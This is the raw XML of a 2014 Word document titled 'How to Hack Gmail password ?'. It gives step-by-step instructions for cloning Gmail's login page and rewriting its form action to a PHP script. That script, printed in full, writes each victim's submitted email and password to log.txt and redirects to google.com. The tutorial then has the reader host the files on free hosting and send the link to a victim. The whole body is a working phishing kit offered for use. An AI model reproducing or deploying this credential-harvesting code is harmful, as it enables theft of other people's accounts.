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2B" w:rsidRPr="0089112B" w:rsidRDefault="0089112B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089112B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>How to Hack Gmail password ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D447F9" w:rsidRDefault="0089112B">
      <w:r w:rsidRPr="0089112B">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4943475" cy="2381250"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\Windows 7 Home Basic\Desktop\g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7 Home Basic\Desktop\gmai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12B" w:rsidRDefault="0089112B"/>
    <w:p w:rsidR="0089112B" w:rsidRDefault="0089112B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How to Hack Gmail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password?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stp1- Open Gmail.com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Right click in an empty space on Page and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Click view page source.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Copy all Content to Notepad &amp; save it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as Gmail.html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.stp2 Open Gmail.htm l with Notepad.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Press (Ctrl + f ) to Search “ action=”https “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.stp- Replace this Syntax https://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accounts.google.com/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ServiceLoginAuth to login.php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Likewise change Method = “ Post” to “ GET ”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and Finally Save it.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stp4- As we Have to create login.php , So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Open New Notepad &amp; Copy Paste this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following Code and Save it as login.php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&lt;?php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header ('Location: http://www.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google.com');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$handle =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fopen("log.txt", "a");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foreach($_GET as $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variable =&gt; $value) {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fwrite($handle, $variable);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fwrite($handle, "=");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fwrite($handle, $value);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fwrite($handle, "\r\n");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}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fwrite($handle, "\r\n");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fclose($handle);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exit;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?&gt;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stp5 Victim will be redirects to http://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hyperlink r:id="rId5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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink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as he Clicks on Login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button.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You can change redirect button to any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address you want.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6- Create a Free hosting account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on 000webhost.com or Drivehq.com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7- Upload both Files Gmail.html &amp; login.php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8- Now Send Gmail.html Link to Victim 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Once he Clicks Login Button , He will be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redirected to Google.com, You can also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change the site with your own desire.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9- File named log.txt will appear. Containing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Victim’s Email and Password.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10- Congrats You hack gmail passwrd (owner yo.) plz shere thes page??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</w:p>
    <w:sectPr w:rsidR="0089112B" w:rsidSect="00D44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9112B"/>
    <w:rsid w:val="0089112B"/>
    <w:rsid w:val="00D4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12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89112B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0089112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91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.facebook.com/l.php?u=http%3A%2F%2Fwww.google.com%2F&amp;h=QAQHrhwK8&amp;s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Home Basic</dc:creator>
  <cp:lastModifiedBy>Windows 7 Home Basic</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-07-23T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-23T07:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>